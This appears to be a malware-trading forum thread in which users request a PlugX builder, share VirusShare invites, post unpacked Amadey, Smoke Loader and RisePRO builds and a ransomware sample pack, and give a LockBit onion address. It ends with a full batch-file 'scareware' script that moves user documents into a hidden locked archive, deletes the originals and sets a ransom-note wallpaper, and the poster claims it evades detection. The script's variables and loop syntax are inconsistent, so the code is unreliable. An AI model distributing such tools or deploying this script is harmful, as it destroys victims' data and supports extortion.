malware samples

[ft9zh1]

народ, у кого есть билдер и управлялка для plugx поделитесь пожалуйста

 

[BankSpace]

На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.

Я знаю, что это старая ветка, но вы все еще хотите поделиться приглашением на virushare.com? Благодарность

 

[AdvanarAholici]

Dark watchman, rat на js + кейлоггер на cs. Также в архиве моя попытка в деобфускацию шарпа, мб кому пригодится.

 

[elLurko]

people who have builder and controller for plugx please share

Copies have shared copies for years. The challenge is obtaining a legitimate copy from the Chinese creators.

 

[pl0uton]

На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.

если вы можете ваша помощь приветствуется

 

[AdvanarAholici]

Dark watchman, rat на js + кейлоггер на cs. Также в архиве моя попытка в деобфускацию шарпа, мб кому пригодится.

Забыл добавить: pass - infected (скорее всего), js по дефолту не обфусцирован.

 

[PYTH14]

RansomwareSamples.7z - BlackMatter, Babuk, .. 35+

lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

также это

vx-underground

www.vx-underground.org

MalwareBazaar | Browse Checking your browser

bazaar.abuse.ch

Reports | Triage

tria.ge

Malware Trends Tracker | ANY.RUN

Explore dynamic articles about various malware types. Look at latest analyzes and IOCs in real-time, track which malware is gaining popularity today.

any.run

 

[michael_]

As others say. vx-underground.org is the place for samples. they have evrything

 

[Superior]

Ребята ищу исходники GP Loader для изучения,желательно Kotlin,если кому не жалко поделитесь

 

[BankSpace]

На virusshare могу дать инвайт, если кому надо. Семплы более, чем 33млн малварей, обновляются ежедневно, типы детекта в комплекте.

Я буду признателен, если вы поделитесь со мной кодом приглашения, я хотел бы изучить некоторые образцы вредоносных программ.

 

[NOP]

Xipher_ бл#ть какая у тебя омерзительная аватарка, смени пожалуйста
По теме все что ты сказал есть на vx underground или на их же гитхабе

 

[Xipher_]

.

 

[ktpm23]

MalwareBazaar - база образцов вредоносного ПО

В базе широкий выбор малварных образцов для исследований и анализа.

MalwareBazaar | Browse Checking your browser

bazaar.abuse.ch

 

[weaver]

Кто мне вытащит два семпла с vt.

VirusTotal

VirusTotal

www.virustotal.com

VirusTotal

VirusTotal

www.virustotal.com

 

[elLurko]

Who will pull out two samples from vt.
Hidden content

I can do it

 

[coder]

Никто так и не стукнул с семплами, пришлось выловить криптованный билд на трекере и распаковать. Если кому надо, вот amadey последней версии и smoke loader, распакованные голые билды. Пасс infected

 

[coder]

Распакованный RisePRO, пасс infected

 

[Lofia]

он с vx?

Никто так и не стукнул с семплами, пришлось выловить криптованный билд на трекере и распаковать. Если кому надо, вот amadey последней версии и smoke loader, распакованные голые билды. Пасс infected

 

[cc0cc]

如果有人需要的话，我可以给你一个virusshare的邀请。超过 3300 万个恶意软件的样本，每天更新，包括检测类型。

我可以PMты

 

[dirty_dahmer]

I wrote "Bane", a sudo-ransomware/scareware today using native windows commands in a .bat file.
All it does is search for files with the extensions you specify, moves them to a folder the script creates, zips the folder and then hides it.
It will then change the desktop wallpaper to one of your choosing (bane.jpg here) - in this case the "ransom note".
Convert the .bat file to an .exe file in Bat_to_exe_Converter and make sure to embed the ransom note/image. FUD.
To be fair, I did include one powershell command at the end - this is what changes the desktop background.
Educational purposes, my friends.

@echo off

:main
:: Set base folders
set "rootFolder=%USERPROFILE%"
set "documentsFolder=%USERPROFILE%\Documents"
set "movedFolder=%documentsFolder%\Moved_Here"
set "tarFile=%documentsFolder%\neon.lock.tar"
set "neonFile=%documentsFolder%\Bane.locked"
set "scriptFile=%~f0"
set "wallpaperImage=%~dp0bane.jpg"

:: Create "Moved_Here" folder if it doesn't exist
if not exist "!encryptedFolder!" mkdir "!encryptedFolder!"

:: Move files recursively
(for /r "%rootFolder%" %%F in (*.png;*.txt;*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.ppyx;*.mdb;*.accdb;*.sql;*.zip;*.rar;*.7z;*.jpeg;*.mp4;*.mov;*.pdf do (
move "%%F" "!encryptedFolder!" >nul
))

:: Create a tar file from the "Moved_Here" folder
tar -cf "!tarFile!" "!encryptedFolder!"

:: Change the name of the tar file to "Bane.locked"
ren "!tarFile!" "Bane.locked"

:: Hide the "Bane.locked" file
attrib +h "Bane.locked"

:: Remove the original "Moved_Here" folder
rmdir /s /q "!encryptedFolder!"

:: Set desktop wallpaper using PowerShell
powershell.exe -ExecutionPolicy Bypass -Command "& {Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Wallpaper { [DllImport(\"user32.dll\", CharSet = CharSet.Auto)] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); public static void SetWallpaper(string path) { SystemParametersInfo(0x0014, 0, path, 0x0002 | 0x0001); } }'; [Wallpaper]::SetWallpaper('%wallpaperImage%')}"